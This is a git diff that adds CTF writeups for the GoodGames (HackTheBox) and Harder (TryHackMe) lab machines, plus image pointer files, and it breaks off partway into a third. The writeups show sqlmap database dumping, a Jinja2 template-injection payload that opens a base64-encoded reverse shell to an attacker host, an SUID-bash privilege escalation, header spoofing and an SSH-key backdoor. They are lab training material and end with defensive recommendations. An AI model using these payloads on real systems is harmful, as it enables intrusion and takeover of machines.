a/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp new file mode 100644 index 0000000..a0418c2 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b552c7fac725cd3d2215c67dd9dc9c0fb1bf72f5572af8cda5e505fa4c2525f0 +size 37834 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png new file mode 100644 index 0000000..5bcfc4b --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85916d7ddd63aff638dc5dbf3780b054f17a5c6a52599d669cedee7042460633 +size 22005 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp new file mode 100644 index 0000000..d197d91 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b927c7cf2dcd507daebd617d71cdeb76f63e94c38e2164ee4a15d530dc92eb8 +size 23990 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png new file mode 100644 index 0000000..3213f2a --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29fbbf1958102f1fec24c7ff566e85cc2bedfa241a6bb76e241f418e073a4726 +size 35870 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp new file mode 100644 index 0000000..82d581f --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f471555ad7b983bf8947bd1704b85f1203fb096f0ffe1e4ea366ab311347ffcc +size 42860 diff --git a/content/writeup-ctf/writeup-goodgames-htb/index.md b/content/writeup-ctf/writeup-goodgames-htb/index.md new file mode 100644 index 0000000..6d713bd --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/index.md @@ -0,0 +1,208 @@ +--- +title: "Writeup - GoodGames (HTB)" +date: 2022-03-19 +slug: "writeup-goodgames-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [GoodGames](https://app.hackthebox.com/machines/GoodGames) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.130 +``` +One TCP ports are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.51) + +![](img/image-2.webp) + +## Exploit + +I start by listing the pages accessible through the website. + +![](img/image-3.webp) + +There are a number of pages, but 3 are pages with a form: login, forgot-password and signup. With a form we can potentially make SQL injection. + +First I get a login request via Burp. + + +```bash +POST /login HTTP/1.1 +Host: 10.10.11.130 +Content-Length: 36 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.10.11.130 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://10.10.11.130/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +email=test%40test.fr&password=azerty +``` +I save this request in a "request.txt" file, then I run SQLmap to determine if this form is injection sensitive. + + +```bash +sqlmap -r request.txt +``` +This form is usable, so I use the following command to list the accessible databases: + + +```bash +sqlmap -r request.txt --dbs +[...] +[12:51:20] [INFO] retrieved: main +available databases [2]: +[*] information_schema +[*] main +[...] +``` +I select the database "main" and start to list the different tables. + + +```bash +sqlmap -r request.txt -D main --dump +[...] +[12:53:58] [INFO] retrieved: blog +[12:54:30] [INFO] retrieved: blog_comments +[12:55:51] [INFO] retrieved: user +[12:56:20] [INFO] fetching columns for table 'blog' in database 'main' +[12:56:20] [INFO] retrieved: 15 +[...] +``` +I select the "user" table and run the following command to dump the data. + + +```bash +sqlmap -r request.txt -D main -T user --dump +[...] +admin@goodgames.htb +[13:00:19] [INFO] retrieved: 1 +[13:00:23] [INFO] retrieved: admin +[13:00:42] [INFO] retrieved: 2b22337f218b2d82dfc3b6f77e7cb8ec +[...] +``` +Ok, we have the credentials of the admin user! We just need to get the password hash and run john to decrypt it. + +![](img/image-4.webp) + +John quickly finds the password: superadministrator. + +I can now connect and access the admin panel. This panel is accessible via a subdomain, so I add it in my /etc/hosts file: + + +```bash +10.10.11.130 internal-administration.goodgames.htb +``` +I fill in the credentials I found before and connect to the admin panel of the site. + +![](img/image-5.webp) + +In this panel I find a tab where I can customize the account nickname. Let's determine the PHP template used by the site. For that I use the following github: + +[PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF - PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThings![](https://github.com/fluidicon.png) + +{{< github repo="swisskyrepo/PayloadsAllTheThings" >}} + + + +Quickly I determine that the site uses the Jinja2 Template. I will be able to use an injection to execute commands on the server. For that I use the following injection: + +```bash +{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} + +``` +To make a shell reversel it's a bit more complex, I didn't manage to put just the command, so I use the base64 method to avoid that the command is modified during the process. + +To do this I encode my reverse in base64 then I use the following injection to transmit it on the remote server: + + +```bash +{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzEyMzQgMD4mMQo=" | base64 -d | bash').read() }} +``` +![](img/image-6.webp) + +I now have a root shell (I think we are in a docker) and I can get the first flag. + + +```bash +root@3a453ab39d3d:/home/augustus# ls +user.txt +root@3a453ab39d3d:/home/augustus# cat user.txt +dec6a8b304bbe0fdfe4b8c46a3562605 +``` +## Privilege escalation + +As said before, I think we are in a docker. What I can confirm after some research. + +After checking my IP, we can safely say that the IP of the host is 172.19.0.1. + +![](img/image-7.webp) + +So I do an nmap scan on the host IP: + +![](img/image-8.webp) + +The SSH port is open! We can now try to connect to the user augustus to exit the docker. + +I first upgrade my reverse shell with the following command (this is very important for the following). + + +```bash +python -c 'import pty; pty.spawn("/bin/bash")' +``` +I am doing an SSH on the user augustus using the password previously used: + +![](img/image-9.webp) + +I am now in the host machine, interesting thing I notice the nmap file I uploaded in the docker is present in the folder of augustus. But what is even more interesting is that he has kept his root privilege! + +![](img/image-10.webp) + +What I will be able to do is to make a copy of bash. Then in the docker add the execution rights. Then go back to the host and create a bash root. + +To do this, I first copy the bash file from the host machine into the augustus folder: + + +```bash +cp /bin/bash ./ + +``` +Then I go back to the docker and add the following rights: + + +```bash +chown root:root bash +chmod 4777 bash +``` +Finally I go back to the host and run a bash root: + + +```bash +augustus@GoodGames:~$ ./bash -p +bash-5.1# cat /root/root.txt +cat /root/root.txt +702332b6faa16ef1b87c5ae52a2ef3df +``` +I now have control of the host machine and can recover the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Patch forms to avoid sql injection +- Use strong passwords +- Do not use the same password for two different services +- Do not launch dockers with root privilege diff --git a/content/writeup-ctf/writeup-harder-thm/featured.png b/content/writeup-ctf/writeup-harder-thm/featured.png new file mode 100644 index 0000000..8c3dff1 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:36799da84aac35347acc68525496bdde70bbf1b673b15bf94ae7ec9bd4dff506 +size 134338 diff --git a/content/writeup-ctf/writeup-harder-thm/featured.webp b/content/writeup-ctf/writeup-harder-thm/featured.webp new file mode 100644 index 0000000..6a07af1 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d453958c4f40d7a89378b82a96d65a936cd207bb5392b0edc62256fbacfd380e +size 92044 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-1.png b/content/writeup-ctf/writeup-harder-thm/img/image-1.png new file mode 100644 index 0000000..3f948cb --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e7e75b56dbd2b93b3fb0ae599c90e1deb7210aa50b23b30d3a1866b9b3b429b +size 30603 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-1.webp b/content/writeup-ctf/writeup-harder-thm/img/image-1.webp new file mode 100644 index 0000000..c4f2601 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4acea638b8f6e6fd3131aee06fbcb51e7e8563f62281d06023b1509781d3d668 +size 31030 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-10.png b/content/writeup-ctf/writeup-harder-thm/img/image-10.png new file mode 100644 index 0000000..8e63d7e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be5386329073711ad7b2faa580df8ac003c7d0b76a22190f3a45a279eb6f0cb9 +size 17465 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-10.webp b/content/writeup-ctf/writeup-harder-thm/img/image-10.webp new file mode 100644 index 0000000..065fca1 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45bff4e0792c81297c9eeae4990cf878f5dc9229e596ba973cb875810ee37e13 +size 11920 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-11.png b/content/writeup-ctf/writeup-harder-thm/img/image-11.png new file mode 100644 index 0000000..f75b10e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38d34bae6f2a0803f157b6331a75758cff19b08466c6d7e37c5426a405daaedd +size 39346 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-11.webp b/content/writeup-ctf/writeup-harder-thm/img/image-11.webp new file mode 100644 index 0000000..f0e441c --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfde33882806e67a9ac1e25a920cac949f711f9e9bd30bc28b31b33c57fd8b61 +size 50372 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-12.png b/content/writeup-ctf/writeup-harder-thm/img/image-12.png new file mode 100644 index 0000000..6418e8b --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91514aaafd66af19cb0ea3de03ebfe70d9bb259577218c1d97fef0fba73e186a +size 17218 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-12.webp b/content/writeup-ctf/writeup-harder-thm/img/image-12.webp new file mode 100644 index 0000000..3271745 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f694614e0e0732d7e8de15913d2574ee6c12ab5de3d7c32dc472e53d5b983911 +size 14392 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-13.png b/content/writeup-ctf/writeup-harder-thm/img/image-13.png new file mode 100644 index 0000000..436675e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c33168d6a3d5b1ed005f67ac3e554ca49267065ede7cc56d7bd36b0ed1c87208 +size 8041 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-13.webp b/content/writeup-ctf/writeup-harder-thm/img/image-13.webp new file mode 100644 index 0000000..61f7924 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44f59332884ecd7501e53b16b9528c92913d648a43afae4a6b2bcf5942839a7f +size 11458 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-14.png b/content/writeup-ctf/writeup-harder-thm/img/image-14.png new file mode 100644 index 0000000..059f092 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c919cc659de7e89ebcd823cfd8a80bf7f53bf372541ebc5b90fd1147c0deab12 +size 30451 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-14.webp b/content/writeup-ctf/writeup-harder-thm/img/image-14.webp new file mode 100644 index 0000000..652c2af --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30161c2fc29cc68da2907e7647595b8434a8f83751321e6d91156cedbc8b6d8d +size 42040 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-15.png b/content/writeup-ctf/writeup-harder-thm/img/image-15.png new file mode 100644 index 0000000..acaa4b0 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4bdfbbf428d94100ea98115ecd9dd5d7ab6ddc34a6cf27f0c229ad80a180e215 +size 23158 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-15.webp b/content/writeup-ctf/writeup-harder-thm/img/image-15.webp new file mode 100644 index 0000000..9cfd25a --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adb655583fc89e6ffa1c47bb7ebeb2cd5c4d7c1dfc4cd6d4ff36815e396211fd +size 26578 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-2.png b/content/writeup-ctf/writeup-harder-thm/img/image-2.png new file mode 100644 index 0000000..2c29c69 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c02b672370f91e5afa52ef1472cbaa2d24238ce82ef22e55b86a042c0f31995c +size 46777 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-2.webp b/content/writeup-ctf/writeup-harder-thm/img/image-2.webp new file mode 100644 index 0000000..f8c4e56 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97ff4d7575d2e52eacd2fd9d7c4f9a8c501e64c3eedb9fb67b6ce62a9234fd48 +size 38670 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-3.png b/content/writeup-ctf/writeup-harder-thm/img/image-3.png new file mode 100644 index 0000000..b993869 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:18f28e19270b9101446204d709dd0fc2c2f7bcd81f0136736c659a39a21074a1 +size 29950 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-3.webp b/content/writeup-ctf/writeup-harder-thm/img/image-3.webp new file mode 100644 index 0000000..7d9f112 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:406833020f4c78d77486ec63445a610f0c5ebdaabee48e19feede1282000fde4 +size 24106 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-4.png b/content/writeup-ctf/writeup-harder-thm/img/image-4.png new file mode 100644 index 0000000..724e66f --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc4d9d618d595b092eed52242324419bcaecc830896dbaa91b7ea8d19aeb427c +size 11902 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-4.webp b/content/writeup-ctf/writeup-harder-thm/img/image-4.webp new file mode 100644 index 0000000..c907798 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce2efee69e85991ea98204a167b18f6767432c48565def71355fa4ef50898c50 +size 8624 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-5.png b/content/writeup-ctf/writeup-harder-thm/img/image-5.png new file mode 100644 index 0000000..3d8dfd2 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e8b32d8fc6de468b7ff7f79666825ee1a045fb64516469d374067617fdeac98 +size 63345 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-5.webp b/content/writeup-ctf/writeup-harder-thm/img/image-5.webp new file mode 100644 index 0000000..d26986e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d0b9a8fd3cf606a22c0de684c6495979d93f1d609f820885c01612ff83ae98 +size 54260 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-6.png b/content/writeup-ctf/writeup-harder-thm/img/image-6.png new file mode 100644 index 0000000..7fb5c50 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:881375e2851d324138c238f7a2d1598f7f27d71b34d3cd37fe7298b0c55e958b +size 69865 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-6.webp b/content/writeup-ctf/writeup-harder-thm/img/image-6.webp new file mode 100644 index 0000000..2c6b939 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b2e45e023ee91580ba967747c4db3eea0cf6b716ff9eeada9c0e1910754dc5b1 +size 91100 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-7.png b/content/writeup-ctf/writeup-harder-thm/img/image-7.png new file mode 100644 index 0000000..1df206e --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44330820f9af9c6903db377aae06cf9c698f634331dd7111dcea7a38f2f44f45 +size 33630 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-7.webp b/content/writeup-ctf/writeup-harder-thm/img/image-7.webp new file mode 100644 index 0000000..6269e56 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7bfedbaa51f6e75b2cf56029e65017aeeb46b2deb3a0bdccb647164e83b773ee +size 29828 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-8.png b/content/writeup-ctf/writeup-harder-thm/img/image-8.png new file mode 100644 index 0000000..0e5d98b --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce4759616d5c84c85b2b7f764370ef0190d0b087181686025ca541b1f997bd9f +size 13236 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-8.webp b/content/writeup-ctf/writeup-harder-thm/img/image-8.webp new file mode 100644 index 0000000..6d6c27d --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5d8c66a32f9d50eba3a981b8b04963e577ed46735da689940db5c475db7d172 +size 11020 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-9.png b/content/writeup-ctf/writeup-harder-thm/img/image-9.png new file mode 100644 index 0000000..791836f --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc1347b1dc77aa83bcef771c7b0a575f51fad23a527a78906b437bd5196a7cf6 +size 7764 diff --git a/content/writeup-ctf/writeup-harder-thm/img/image-9.webp b/content/writeup-ctf/writeup-harder-thm/img/image-9.webp new file mode 100644 index 0000000..73724fe --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42cd84dbd3d963b90c98a72a5bde2f6abaf62a8348ef4a47e6cd7d4e65213741 +size 6016 diff --git a/content/writeup-ctf/writeup-harder-thm/index.md b/content/writeup-ctf/writeup-harder-thm/index.md new file mode 100644 index 0000000..bdb23a2 --- /dev/null +++ b/content/writeup-ctf/writeup-harder-thm/index.md @@ -0,0 +1,217 @@ +--- +title: "Writeup - Harder (THM)" +date: 2022-04-28 +slug: "writeup-harder-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Harder](https://tryhackme.com/room/harder) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.199.197 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.3) +- 80/tcp : HTTP web server (nginx 1.18.0) + +## Exploit + +At first I start by scanning the files on the site. + +![](img/image-2.webp) + +I can't find anything in particular, so I make a query with `curl` to see if I find something interesting in the Header. + +![](img/image-3.webp) + +I find that there is a subdomain: `pwd.harder.local`. When I go to the page I find the following login form: + +![](img/image-4.webp) + +After a few tries with the classic passwords, I find that it is possible to connect with `admin/admin`. Then I get a page with the following message: + + +```bash +extra security in place. our source code will be reviewed soon ... +``` +I scan the subdomain to see if it has anything interesting: + +![](img/image-5.webp) + +There is clearly a Git project folder, so I will download it locally to study it. To do this I use [gitTools](https://github.com/internetwache/GitTools): + +![](img/image-6.webp) + +At first I look at the list of commits, there are 3 of them. + +![](img/image-7.webp) + +The second one is pretty interesting. So I look at the differences. While analyzing the code, I come across the following part: + + +```bash ++ +``` +We learn that it is necessary to have the parameters `h`, `host` et `n`. After some research on the function `hash_hmac`, I found on this [site](https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up/) that it is possible to generate a hash ourselves and to use it for the authentication to the page. To do this I first generate a hash with the following commands: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents/tmp/.git] +└─$ php -a +Interactive shell + +php > $secret = hash_hmac('sha256', $_GET['n'], $secret); +PHP Warning: Undefined array key "n" in php shell code on line 1 +PHP Warning: Undefined variable $secret in php shell code on line 1 +php > $secret = hash_hmac('sha256', "d3vyce.fr", false); +php > echo $secret; +d0455abc97030b6f667f0f090493beca091e92c1e8c0e04ae09541afb26380c8 +``` +Can I create the following link: + + +```bash +http://pwd.harder.local/?n[]=1&h=d0455abc97030b6f667f0f090493beca091e92c1e8c0e04ae09541afb26380c8&host=d3vyce.fr +``` +I came across a page with the following content: + +![](img/image-8.webp) + +So I add this new subdomain to the `/etc/hosts` file, then I go to the page. I get the following message: + + +```bash +Your IP is not allowed to use this webservice. Only 10.10.10.x is allowed +``` +To access the page anyway, I add an `X-Forwarded-For` field to my request. + + +```bash +GET /index.php HTTP/1.1 +Host: shell.harder.local +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +X-Forwarded-For: 10.10.10.240 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=eb15g7jblveoceue5ekdjooiqj +Connection: close +``` +I finish on the following page: + +![](img/image-9.webp) + +It is a page that allows to execute commands, after some commands, I look for files related to the user on which the site is executed: `evs`. + +![](img/image-10.webp) + +I find a script `evs-backup.sh` which has the following content: + + +```bash +#!/bin/ash + +# ToDo: create a backup script, that saves the /www directory to our internal server +# for authentication use ssh with user "evs" and password "U6j1brxGqbsUA$pMuIodnb$SZB4$bw14" +``` +So now I can connect to the user via SSH and get the first flag. + +![](img/image-11.webp) + +## Privilege escalation + +I start by running the [linpeas.sh](https://linpeas.sh) script to get an overview of the machine. I find the following files: + +![](img/image-12.webp) + +Looking at the content of the script, I understand that it is used to execute scripts encrypted with gpg, knowing that we have the public key of the root user, it should be possible to create a script, sign it with the root key, then execute it as root! + + +```bash +#!/bin/sh + +if [ $# -eq 0 ] + then + echo -n "[*] Current User: "; + whoami; + echo "[-] This program runs only commands which are encypted for root@harder.local using gpg." + echo "[-] Create a file like this: echo -n whoami > command" + echo "[-] Encrypt the file and run the command: execute-crypted command.gpg" + else + export GNUPGHOME=/root/.gnupg/ + gpg --decrypt --no-verbose "$1" | ash +fi +``` +I start by importing the key with the following command: + +![](img/image-13.webp) + +Then I check that it is well imported with the following command: + + +```bash +harder:~$ gpg --list-key +/home/evs/.gnupg/pubring.kbx +---------------------------- +pub ed25519 2020-07-07 [SC] + 6F99621E4D64B6AFCE56E864C91D6615944F6874 +uid [ unknown] Administrator +sub cv25519 2020-07-07 [E] +``` +I then create a script that will create a `/root/.ssh` and import my rsa.pub key. This should allow me to connect as root via SSH. + + +```bash +#!/bin/bash +mkdir /root/.ssh +echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBDGmzCw/2VOIhk9owjxdyz+OwnO46rAXiDzV5gn6zObLChBCnpT1PpbYDlFNNwwykB0VCMOAKyrx465I0PxpgI8H8uh1goGYzUuNI0JmLnpUbTwkpTJgEYLA3pAM2g60XrRu5zf6bKuBTKm8gKrHuvy68EpAH+QPL7fnPmhMil+aNCOdZ9sQNMakmbQFvbWbeQ8SRbGHCPuRcViNSnkKhzzDNr+r8Co7ngT6lTHDdX7AdkDkwQ90rbi6Rr8x6GR9NLUcZ1D8DwlQ9MsHTq47RzRWUAUtMdtpUIO1qJNMcssO1hqA/Ej4tWsC5gyTCO7wzpd2V8OLMYvwBwbD/T5Upq4yBUorIr47oLqfO1ox+w7JX10hLf8PjFMxyuNY4karNNShWfFWX/jIyj7uxwYs4D/GDLS22EUtR7AMDgua1P3MjRBIT8u0O0Rwwn8Pj1C9uFQ9qnGlfEvGWqNRHKf777U6hwQLVn+M4aSU+SoW5arC+JglcnVpSquZT9qCXgO0= d3vyce@kali" > /root/.ssh/authorized_keys +``` +I then encrypt the script with the following command: + +![](img/image-14.webp) + +Then I execute it with the following command: + + +```bash +run-crypted.sh script.sh +``` +I can now connect via SSH to the root account and get the last flag. + +![](img/image-15.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave source code directly accessible on a website +- Do not leave files with credit cards in them +- Run web applications with a user with the minimum possible rights +- Do not let the root public key accessible by another user than root diff --git a/content/writeup-ctf/writeup-irked-htb/featured.png b/content/writeup-ctf/writeup-irked-htb/featured.png new file mode 100644 index 0000000..45f0a5d --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d08a14d524e6adcd8ead9498776f7c92a57cae6f82530fc5778d168a94568e04 +size 272240 diff --git a/content/writeup-ctf/writeup-irked-htb/featured.webp b/content/writeup-ctf/writeup-irked-htb/featured.webp new file mode 100644 index 0000000..77fbe28 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e964f5b0ce6655ba56191eaf946340391a8776ba77cadeccea509b1e6f0d8045 +size 24068 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-1.png b/content/writeup-ctf/writeup-irked-htb/img/image-1.png new file mode 100644 index 0000000..22308a6 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1dcef166fdb2bba4a378f274f8938c230ea1456db2e548050ce73495e5fc8a35 +size 30464 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-1.webp b/content/writeup-ctf/writeup-irked-htb/img/image-1.webp new file mode 100644 index 0000000..c3c3786 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:911d16c0a8a5168dbd5cc5c6ed3a2a818e7d225db3dc27cf3c72691992a6da8d +size 32382 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-10.png b/content/writeup-ctf/writeup-irked-htb/img/image-10.png new file mode 100644 index 0000000..2b5b1b1 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbe5adcd12137459431ff68ff030d967e2f99d3fcab9a34bb527046a9451a634 +size 5084 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-10.webp b/content/writeup-ctf/writeup-irked-htb/img/image-10.webp new file mode 100644 index 0000000..df151ff --- /dev/null +++ 